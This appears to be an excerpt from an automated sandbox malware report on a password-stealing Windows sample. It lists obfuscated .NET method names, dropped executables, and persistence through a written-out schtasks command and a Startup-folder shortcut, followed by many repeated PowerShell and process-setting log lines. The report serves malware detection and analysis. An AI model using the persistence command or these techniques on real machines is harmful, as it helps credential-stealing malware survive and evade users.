                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, edf7UgrQnKs2ebtqMV.csHigh entropy of concatenated method names: 'BDm7uAuotw', 'vG27RY96eC', 'iW47iBP8JB', 'Lwt7NFCxOA', 'uKN7jqTyEJ', 'Xa07x7hUPt', 'yF47dUmTPc', 'cGG7SrSnk6', 'Vsb7UKZ7CN', 'vdF7enRR2s'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, uBRAahgBpjjHAISb74.csHigh entropy of concatenated method names: 'K3FmbY1YJR', 'NXdmPvYn5c', 'hH2mGZk25c', 'YgMm9U3gmc', 'SdWm5WBtpe', 's8Omyf2IGH', 'oN4m6bh4Fj', 'oAfKqiuc5L', 'BHgK2qjDZP', 'JBMK0R6hgB'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, tqIBqAREa8Q6WD82rO.csHigh entropy of concatenated method names: 'oqepaiEAfx', 'O0ppMnjI6s', 'zASpuC6Uch', 'oNgpR5Bfx1', 'zihpLJfF5c', 'bYepcRpBqh', 'byFpH0hPBV', 'kbYpKSa3pa', 'slCpmXx3yQ', 'dY6pDERiVP'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, YrBo172giAk8gnYb5y.csHigh entropy of concatenated method names: 'jLNK9RkpjU', 'jDqK5srB9y', 'YNFKpqQ605', 'mlSKyNMo96', 'pjAK6PEMCb', 'WmGK1gCAG8', 'SvCKoLnoxa', 'YBGKkbZ0J2', 'j66KAEF65s', 'm8DKseDxsn'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, IGROvpvPicb6LXDyW8.csHigh entropy of concatenated method names: 'ToString', 'FRXceWUqUW', 'iWbcNSn1VL', 'WUOcYiy4nW', 'gfMcjosZX0', 'ec0cxHXLSb', 'z0xclwifYa', 'kEYcdamiwS', 'uDgcSWsyri', 'lEscCp8Zuy'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, cIaTm3psrRfHXmD1RG.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oCan0wQVis', 'WZZng9b3wj', 'PWbnzhdT6U', 'MdHP4yE005', 'sclPbT9YI5', 'cdbPnVqbBV', 'SV7PPnnbeL', 'STlOBbsUV3bnGufXjvA'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, y6w8lanDc3YI69TWBE.csHigh entropy of concatenated method names: 'nyeFQhnQR', 'ltLaMv2oY', 'dgdMFTuuV', 'AeX3aUBmU', 'MSRReNyvr', 'pyrhlU4rK', 'hPn8DBe9vHxtYNSPlh', 'qTHsxABh8jSIc25uaK', 'j9oKCMQAL', 'WirDCT9TW'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, fw1IB4uqclhjXGAZvN.csHigh entropy of concatenated method names: 'TJS589BsFN', 'L4a5trh7oD', 'lGG5vR5eHt', 'Ai75Q0fsUC', 'uuR5VZA5yf', 'Ji15XF87XY', 'tJi5qpmvY6', 'gd352If2fk', 'vD750Tpdrt', 'gu45gerD22'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, h8IVSedMFQpixvNuAY.csHigh entropy of concatenated method names: 'Uop19Sv7oZ', 'LCh1p4ygHC', 'wdD16GfXSs', 'mug6gL0SJi', 'QJr6zPMSRV', 'rRL14BF3S1', 'U6g1b2UMtm', 't5e1nGkEWF', 'ner1P78PNi', 'Nmd1GOvoiU'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, rqtLsRCgxuqruShBFT.csHigh entropy of concatenated method names: 'X0i1TxqR1y', 'W281BHixDh', 'd7X1Ff5JqD', 'ucp1a6P03u', 'tSi1OWedCB', 'SNL1MYapKf', 'W7M13s0Vda', 'WFy1u5BEQp', 'Kmp1Rj5jkl', 'e7P1hLmcf6'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, tAI8DEb4LaCGCcG8H2k.csHigh entropy of concatenated method names: 'dugmTYxeIh', 'sLQmBDpYo7', 'pkamF2fsW8', 'j9vmaWG1Iy', 'NpwmOFd8QN', 'irrmM5eVXr', 'b4cm3kDtwx', 's3LmuMG0k7', 'lbqmRgYJJd', 'DjlmhFTXcf'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, plmLCiQhBDHul7rqkX.csHigh entropy of concatenated method names: 'r0JHA2EhL5', 'pc5HstfjIL', 'ToString', 'ivhH9JrlJV', 'YTjH5EvEX2', 'TiaHpWwtHB', 'rKsHymhbFF', 'zGWH66NIxk', 'sGuH1ZFB4s', 'HylHouSDZA'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, OrioeaGQ0PM1syyFSu.csHigh entropy of concatenated method names: 'Wh9b1w1IB4', 'VclbohjXGA', 'lEabA8Q6WD', 'R2rbsOixDH', 'LWfbLWVXXg', 'GQTbcuS7Mq', 'AfX9rYZ8AUDXabg2KR', 'NsuwOIG8KB3G8YZtXj', 'JgqbbYma98', 'WKkbPIUESW'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, QHOw32oMEn7lDsZbTi.csHigh entropy of concatenated method names: 'PaDPJcZBwj', 'm6BP9oHuFS', 'vTrP5EGsJ9', 'DivPprJBnB', 'kCkPyW7e3L', 'DgtP6Iy9MZ', 'UhfP1B1IsJ', 'ig2PodeqMd', 'gLgPkiaAA3', 'HDVPAwpcL7'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, JAtyCrXlg8pJIddapt.csHigh entropy of concatenated method names: 'OqNH2OyRYv', 'Y3iHgyVFry', 'p8DK40Kvm2', 'YfIKbdCXLX', 'uCEHemnlm9', 'itoHwsc5sD', 'lQBHrenmsy', 'MLGH8TxLs8', 'q6fHtUsZFS', 'gSyHvxVuE5'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, PT5L9M0MhqK8Q0f7MB.csHigh entropy of concatenated method names: 'B0SKi9RZAa', 'alYKNVsR4I', 'k6tKYAZiXt', 'WyEKjouC94', 'p0dK8xMR1K', 'xHPKxNP1Vg', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, xZ6IqqbPfae5139K1hU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LCoD8uLU3x', 'M3PDt3SWOp', 'sEFDvqlpbx', 'cWxDQkJDKy', 'aaVDVfODUy', 'EJnDXHFVk8', 'GrYDqwbkrk'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, VXgNQTiuS7Mq9yDKkD.csHigh entropy of concatenated method names: 'VIl6J7ofwG', 'EKZ65uyQIS', 'S9M6yIycuy', 'dte61lTb4u', 'C996oyvDog', 'k8jyVMvgw2', 'zByyXhWeBH', 'CpVyqFV9G3', 'Hwny2GwGDL', 'kq1y0OpTMX'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, zV7Ah65u26UDaxa1D3.csHigh entropy of concatenated method names: 'Dispose', 'sZEb08TIDQ', 'fYXnNaZava', 'gtHwwSs2oe', 'egrbgBo17g', 'GAkbz8gnYb', 'ProcessDialogKey', 'gyrn4T5L9M', 'ChqnbK8Q0f', 'nMBnnIBRAa'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, Nv3sLXzlWLSj3jB4F1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0em7AeEpF', 'uXNmLZqKNN', 'JnLmcJvsgi', 'uprmHglUZF', 'vgQmKXd0hK', 'FEXmmalpvG', 'NZlmDerdZd'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, edf7UgrQnKs2ebtqMV.csHigh entropy of concatenated method names: 'BDm7uAuotw', 'vG27RY96eC', 'iW47iBP8JB', 'Lwt7NFCxOA', 'uKN7jqTyEJ', 'Xa07x7hUPt', 'yF47dUmTPc', 'cGG7SrSnk6', 'Vsb7UKZ7CN', 'vdF7enRR2s'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, uBRAahgBpjjHAISb74.csHigh entropy of concatenated method names: 'K3FmbY1YJR', 'NXdmPvYn5c', 'hH2mGZk25c', 'YgMm9U3gmc', 'SdWm5WBtpe', 's8Omyf2IGH', 'oN4m6bh4Fj', 'oAfKqiuc5L', 'BHgK2qjDZP', 'JBMK0R6hgB'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, tqIBqAREa8Q6WD82rO.csHigh entropy of concatenated method names: 'oqepaiEAfx', 'O0ppMnjI6s', 'zASpuC6Uch', 'oNgpR5Bfx1', 'zihpLJfF5c', 'bYepcRpBqh', 'byFpH0hPBV', 'kbYpKSa3pa', 'slCpmXx3yQ', 'dY6pDERiVP'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, YrBo172giAk8gnYb5y.csHigh entropy of concatenated method names: 'jLNK9RkpjU', 'jDqK5srB9y', 'YNFKpqQ605', 'mlSKyNMo96', 'pjAK6PEMCb', 'WmGK1gCAG8', 'SvCKoLnoxa', 'YBGKkbZ0J2', 'j66KAEF65s', 'm8DKseDxsn'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, IGROvpvPicb6LXDyW8.csHigh entropy of concatenated method names: 'ToString', 'FRXceWUqUW', 'iWbcNSn1VL', 'WUOcYiy4nW', 'gfMcjosZX0', 'ec0cxHXLSb', 'z0xclwifYa', 'kEYcdamiwS', 'uDgcSWsyri', 'lEscCp8Zuy'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, cIaTm3psrRfHXmD1RG.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oCan0wQVis', 'WZZng9b3wj', 'PWbnzhdT6U', 'MdHP4yE005', 'sclPbT9YI5', 'cdbPnVqbBV', 'SV7PPnnbeL', 'STlOBbsUV3bnGufXjvA'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, y6w8lanDc3YI69TWBE.csHigh entropy of concatenated method names: 'nyeFQhnQR', 'ltLaMv2oY', 'dgdMFTuuV', 'AeX3aUBmU', 'MSRReNyvr', 'pyrhlU4rK', 'hPn8DBe9vHxtYNSPlh', 'qTHsxABh8jSIc25uaK', 'j9oKCMQAL', 'WirDCT9TW'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, fw1IB4uqclhjXGAZvN.csHigh entropy of concatenated method names: 'TJS589BsFN', 'L4a5trh7oD', 'lGG5vR5eHt', 'Ai75Q0fsUC', 'uuR5VZA5yf', 'Ji15XF87XY', 'tJi5qpmvY6', 'gd352If2fk', 'vD750Tpdrt', 'gu45gerD22'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, h8IVSedMFQpixvNuAY.csHigh entropy of concatenated method names: 'Uop19Sv7oZ', 'LCh1p4ygHC', 'wdD16GfXSs', 'mug6gL0SJi', 'QJr6zPMSRV', 'rRL14BF3S1', 'U6g1b2UMtm', 't5e1nGkEWF', 'ner1P78PNi', 'Nmd1GOvoiU'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, rqtLsRCgxuqruShBFT.csHigh entropy of concatenated method names: 'X0i1TxqR1y', 'W281BHixDh', 'd7X1Ff5JqD', 'ucp1a6P03u', 'tSi1OWedCB', 'SNL1MYapKf', 'W7M13s0Vda', 'WFy1u5BEQp', 'Kmp1Rj5jkl', 'e7P1hLmcf6'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, tAI8DEb4LaCGCcG8H2k.csHigh entropy of concatenated method names: 'dugmTYxeIh', 'sLQmBDpYo7', 'pkamF2fsW8', 'j9vmaWG1Iy', 'NpwmOFd8QN', 'irrmM5eVXr', 'b4cm3kDtwx', 's3LmuMG0k7', 'lbqmRgYJJd', 'DjlmhFTXcf'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, plmLCiQhBDHul7rqkX.csHigh entropy of concatenated method names: 'r0JHA2EhL5', 'pc5HstfjIL', 'ToString', 'ivhH9JrlJV', 'YTjH5EvEX2', 'TiaHpWwtHB', 'rKsHymhbFF', 'zGWH66NIxk', 'sGuH1ZFB4s', 'HylHouSDZA'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, OrioeaGQ0PM1syyFSu.csHigh entropy of concatenated method names: 'Wh9b1w1IB4', 'VclbohjXGA', 'lEabA8Q6WD', 'R2rbsOixDH', 'LWfbLWVXXg', 'GQTbcuS7Mq', 'AfX9rYZ8AUDXabg2KR', 'NsuwOIG8KB3G8YZtXj', 'JgqbbYma98', 'WKkbPIUESW'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, QHOw32oMEn7lDsZbTi.csHigh entropy of concatenated method names: 'PaDPJcZBwj', 'm6BP9oHuFS', 'vTrP5EGsJ9', 'DivPprJBnB', 'kCkPyW7e3L', 'DgtP6Iy9MZ', 'UhfP1B1IsJ', 'ig2PodeqMd', 'gLgPkiaAA3', 'HDVPAwpcL7'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, JAtyCrXlg8pJIddapt.csHigh entropy of concatenated method names: 'OqNH2OyRYv', 'Y3iHgyVFry', 'p8DK40Kvm2', 'YfIKbdCXLX', 'uCEHemnlm9', 'itoHwsc5sD', 'lQBHrenmsy', 'MLGH8TxLs8', 'q6fHtUsZFS', 'gSyHvxVuE5'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, PT5L9M0MhqK8Q0f7MB.csHigh entropy of concatenated method names: 'B0SKi9RZAa', 'alYKNVsR4I', 'k6tKYAZiXt', 'WyEKjouC94', 'p0dK8xMR1K', 'xHPKxNP1Vg', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, xZ6IqqbPfae5139K1hU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LCoD8uLU3x', 'M3PDt3SWOp', 'sEFDvqlpbx', 'cWxDQkJDKy', 'aaVDVfODUy', 'EJnDXHFVk8', 'GrYDqwbkrk'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, VXgNQTiuS7Mq9yDKkD.csHigh entropy of concatenated method names: 'VIl6J7ofwG', 'EKZ65uyQIS', 'S9M6yIycuy', 'dte61lTb4u', 'C996oyvDog', 'k8jyVMvgw2', 'zByyXhWeBH', 'CpVyqFV9G3', 'Hwny2GwGDL', 'kq1y0OpTMX'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, zV7Ah65u26UDaxa1D3.csHigh entropy of concatenated method names: 'Dispose', 'sZEb08TIDQ', 'fYXnNaZava', 'gtHwwSs2oe', 'egrbgBo17g', 'GAkbz8gnYb', 'ProcessDialogKey', 'gyrn4T5L9M', 'ChqnbK8Q0f', 'nMBnnIBRAa'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, Nv3sLXzlWLSj3jB4F1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0em7AeEpF', 'uXNmLZqKNN', 'JnLmcJvsgi', 'uprmHglUZF', 'vgQmKXd0hK', 'FEXmmalpvG', 'NZlmDerdZd'
                Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, edf7UgrQnKs2ebtqMV.csHigh entropy of concatenated method names: 'BDm7uAuotw', 'vG27RY96eC', 'iW47iBP8JB', 'Lwt7NFCxOA', 'uKN7jqTyEJ', 'Xa07x7hUPt', 'yF47dUmTPc', 'cGG7SrSnk6', 'Vsb7UKZ7CN', 'vdF7enRR2s'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile created: C:\Users\user\AppData\Roaming\pNYyTm.exeJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
